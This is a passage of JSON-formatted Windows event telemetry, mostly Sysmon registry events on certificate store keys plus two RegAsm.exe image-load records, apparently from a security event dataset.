"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "RegAsm.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "mscoree.dll", - "image_path": "C:\\Windows\\SysWOW64\\mscoree.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 